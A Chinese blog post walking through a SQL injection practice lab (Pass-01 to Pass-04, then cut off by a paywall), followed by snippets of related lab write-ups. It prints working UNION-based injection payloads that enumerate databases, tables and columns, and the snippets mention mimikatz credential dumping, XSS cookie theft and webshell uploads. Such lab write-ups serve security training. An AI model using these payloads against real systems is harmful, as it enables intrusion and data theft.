掌控安全学院SQL注入靶场

已于 2022-11-22 09:36:28 修改
阅读量3.8k 收藏 22
点赞数 5
分类专栏: 打爆靶场 文章标签: 安全 sql
于 2022-11-18 16:44:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qaq517384/article/details/127865776
版权
本文介绍了掌控安全学院的SQL注入靶场,涵盖多种注入类型,如显错注入、字符型注入、布尔盲注等,并提供了详细的渗透测试步骤,包括爆库、查表、查列及获取flag的方法。
摘要由CSDN通过智能技术生成

掌控安全学院SQL注入靶场

靶场地址

http://inject2.lab.aqlab.cn

Pass-01 显错注入

判断注入类型发现是数字型注入

1 or 1=1 #
1' or '1'='1 #
1" or "1"="1 #

利用order by得到数据库有三列
?id=0 union select 1,2,3#得到回显位23
在这里插入图片描述

查库名
可以通过information_schema库或者直接select database()

?id=0 union select 1,(select group_concat(schema_name) from information_schema.schemata),(select database())#

在这里插入图片描述查表名

?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='error'),3#

在这里插入图片描述

查列名

?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='error'),(select group_concat(column_name) from information_schema.columns where table_name='error_flag')#

在这里插入图片描述可以看到有flag列,直接输出

?id=0 union select 1,(select group_concat(flag) from error.error_flag),3#

在这里插入图片描述

Pass-02

测试得题目为单引号字符型注入
这里#注释会报错,转用--+

?id=0' union select 1,2,3 --+

在这里插入图片描述

爆库

?id=0' union select 1,(select database()),3--+

在这里插入图片描述
后面和Pass-01一样
直接得到flag

?id=0' union select 1,(select group_concat(flag) from error.error_flag),3--+

在这里插入图片描述

Pass-03

查看语句得知需要')闭合前面的('

?id=0') union select 1,2,3--+

在这里插入图片描述
剩下同理,没有过滤

Pass-04

双引号即可

?id=0") union select 1,2,3--+

在这里插入图片描述

Pass-05 POST注入

GET换PO

最低0.47元/天 解锁文章
有点水啊
关注
专栏目录
ctf实战 掌控安全靶场 第七关通关记录
wh1te 小白的博客
09-27 994
 题目  远程连接设置可以上传本机文件 在本地设备与资源中选择详细信息 将要上传的工具的驱动器勾选上,可以选择u盘   把mimikatz上传至虚拟机  privilege::debug 提升权限   sekurlsa::logonpasswords 抓取密码   得到最后的flag   通关    ...
SQL注入-05】布尔盲注案例
m0_64378913的博客
04-26 1838
目录1 概述2 操作环境3 操作具体步骤3.1 判断是否存在注入点及注入的类型3.2 测试数据库库名长度3.3 逐个测试数据库库名的字符3.4 测试该数据库中所有表名3.5 测试users表中的所有字段名3.6 测试敏感字段的字段内容4 总结参考文章 1 概述 当改变浏览器传给后台SQL的参数后,浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入,这时候可以试试看能否使用布尔注入。具体参考《【SQL注入-02】SQL注入点的简单判断》。 布尔盲注:一般情况下,当带入参数为真
渗透测试(一)SQL盲注
Cobb_L
08-28 435
SQL盲注一 测试靶场掌控安全学院SQL注入靶场):https://hack.zkaq.cn/battle/target?id=1bd1990363f28cb9 找出原链接查询数据字段数 order by 3 时无数据了,则可判断字段数为2,可做接下来操作 试着找到当前数据库名长度(2.3步其实不用做) and length(database())>11 尝试判断库名长度,测试为12 尝试将库名找出 and ascii(substr(database(),1,1))>=107 通过
掌控安全SQL注入靶场之显错注入——第一关
qq_64076172的博客
08-15 209
备注:爆数据库名时可以使用?id=0 union select 1,version(),3,查询数据库的版本号,只有MYSQL5.0以上版本中才存在自带数据库information_schema,才能使用文中的数据库查询语句。得出数据库名为‘error’,这里用id=0或id=1 and 1=2皆可,第一个条件为false就行,但是-1这里不适用。得到数据库‘error’下存在两个表‘error_flag’,'user',我们想要的flag在error_flag表下面。第三步,爆数据库error下的表名。
web基础—dvwa靶场(七)SQL Injection
最新发布
m0_74080781的博客
09-18 1034
SQL 注入攻击就是 Web 程序对用户的输入没有进行合法性判断,从而攻击者可以从前端向后端传入攻击参数,并且该参数被带入了后端执行。在很多情况下开发者会使用动态的 SQL 语句,这种语句是在程序执行过程中构造的,不过动态的 SQL 语句很容易被攻击者传入的参数改变其原本的功能。当我们进行手工 SQL 注入判断是否存在注入,注入是字符型还是数字型猜解SQL查询语句中的字段数;确定显示的字段顺序;获取当前数据库;获取数据库中的表;获取表中的字段名;下载数据。
sql显错注入——靶场操作记录<掌控安全
chick11的博客
09-28 2598
掌控安全学院SQL注入靶场 存在index.php? 前几节课讲过?一般为get传参! 当然界面上也说了 ————————————————开始尝试—————————————— 1.判断是否存在注入 当输入id=2时页面发生变化 再继续掌控安全学院SQL注入靶场 当加上条件and1=2时界面不显示(报错)基本确定存在注入 ————————————————判断字段数——————————————掌控安全学院SQL注入靶场输入order by 4 之后原本显示正常的界面显示不正常! 判断当前表中字段.
掌控安全sql注入全集
人间体佐菲的博客
05-20 995
掌控安全sql注入
密码找回漏洞—靶场操作<掌控安全
chick11的博客
09-27 665
这题主要就是绕过验证码 来到靶场根据靶场提示访问:http://117.41.229.122:8010/hahq_Admin/?umail=408362692@qq.com&type=ok 发现是一个重置密码的页面 我们把这题的源码下载下来进行审计 全局搜索里搜:密码找回 通过审计发现,$fsjs=rand(10,10000)随机生成认证码, 只有认证码一样就可以重置密码 我么通过抓包进行爆破 爆破成功 ...
掌控安全靶场第三章
小白渣的博客
12-09 1438
cookie 伪造目标权限 打开传送门,可以看到这样的页面 按照题目提示是一个存储型的xss,于是我们在能留言的地方都输入看看有没有弹窗, 成功弹窗了 因为XSS Payload的强大,也是为了使用的方便,有安全研究者将许多功能封装了起来做成了XSS平台。也是因为插入点一般都有长度限制,所以说xss一般攻击都需要外链。我在这里演示用的是网上的xss平台:http://xsspt.com,随便...
sqli-labs靶场7关(知道根目录的注入)
qq_46527080的博客
12-12 837
知识点 首先要掌握一下相关的函数和知识点 函数: load_file()函数 是MySQL读取本地文件的函数(读取) into outfile()函数 是用来导出文件的(写入) @@basedir函数 查询当前路径 @@datadir函数 查询数据库安装路径 1.load_file()函数用法 2.into outfile()函数用法 查看一下 3.查询当前路径: select @@basedir; 4.查询当前MySQL路径: select @@datadir; 5.解决写入权限问题 在
Kali linux在DVWA靶场SQL注入
qq_74298120的博客
06-20 1954
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
封神台靶场(一)为了女神小芳 【SQL注入攻击】(超级详细)
xiao_mai_的博客
05-11 1002
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
掌控安全靶场公开课第一章第一节
养乐多的博客
01-24 439
Q:什么是显示位:A:我们在进行手工SQL注入的时候会用到ORDER BY 查询列数,然后通过UNION SELECT爆出在网页中的显示位。这个显示位指的是网页中能够显示数据的位置。举例来说,比如我们通过ORDER BY命令知道了表的列数为11。然后再使用UNION SELECT 1,2,3…,11 from table,网页中显示了信息8,那么说明网页只能够显示第8列中信息,不能显示其他列的信息。也可以理解为网页只开放了8这个窗口,你想要查询数据库信息就必须要通过这个窗口。
ctf实战 掌控安全靶场 第一关通关记录
wh1te 小白的博客
09-17 5942
第一关 进入传送门  发现是一个猫舍网站  点击查看新闻   进入猫舍界面内 网址为http://120.203.13.75:6815/?id=1  疑似可注入  尝试 and1=1回显正常 尝试 and1=2回显失败 存在sql注入  可以选择手工注入  也可以直接用工具   这里我用的是sqlmap(一个很强大的工具) sqlmap具体使用方法自己百度 贴一个比较好的...
ctf实战 掌控安全靶场 第五关通关记录
wh1te 小白的博客
09-27 1139
题目 cookie上一关获得了 就直接在开发者工具里自己修改cookie即可,我用的火狐直接修改就是了(f12)  将名称改为上一关获得的cookie名,值改为上一关得到的cookie值 修改好了点击“准备好了即可” 查看可以上传文件类型 发现可以上传cer文件可以利用iis6.0漏洞进行上传asp木马后缀名改为.cer  用菜刀上传即可 在产品管理中可以修改 文件图片 ...
命令执行漏洞--ibos靶场靶场环境是掌控安全的)
xiesiyuan1的博客
02-27 1313
命令执行:用户传入的参数,会被当成系统指令来执行,指令内容用户可控,属于代码执行的一种ctrl+u:在view-source模式自动换行。
靶场实战——SQL注入
weixin_58666006的博客
07-25 494
id=1 union select 1,group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME = 'admin' and TABLE_SCHEMA='maoshe' LIMIT 1,1 -- -id=1 union select 1,database() LIMIT 1,1 -- -输入payload:payload:http://pu2lh35s.ia.aqlab.cn/?
post/get注入——靶场操作记录<掌控安全
chick11的博客
09-28 469
post注入第一题 ——————————分析靶场—————————— 发现区别 怎么没有id=1? 没有那我自己输入试一下看行不行 得出答案……不行 post & get 区别一 get 会进行url编码 再次寻找用户可以自己输入数据的地方 尝试万能密码登录试一下 发现界面发生变化 ————————————————尝试注入——————————————— 再次输入其他信息试一下 发现输入内容被两个单引号所闭合 这会造成输入内容当成字符串,而不是代码
掌控安全靶场第二章:遇到阻难!绕过WAF过滤!
k1k5cn的博客
11-10 2613
最近在学习CTF,前不久发现一个还不错的靶场 封神台 - 掌控安全在线演练靶场 二话不说,开干吧 第二章:遇到阻难!绕过WAF过滤! 一、测试是否有注入点 附上链接 https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb 标题上写了是【配套课时:SQL注入攻击原理 实战演练】SQL注入, 随便点击一个新闻。在id=171后面加一个引号’,测试一下是否有SQL注入。 有弹框了,提示过滤了很多关键字。下一步考虑如何绕过这些关键字。 二、绕过WAF关键字过滤
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值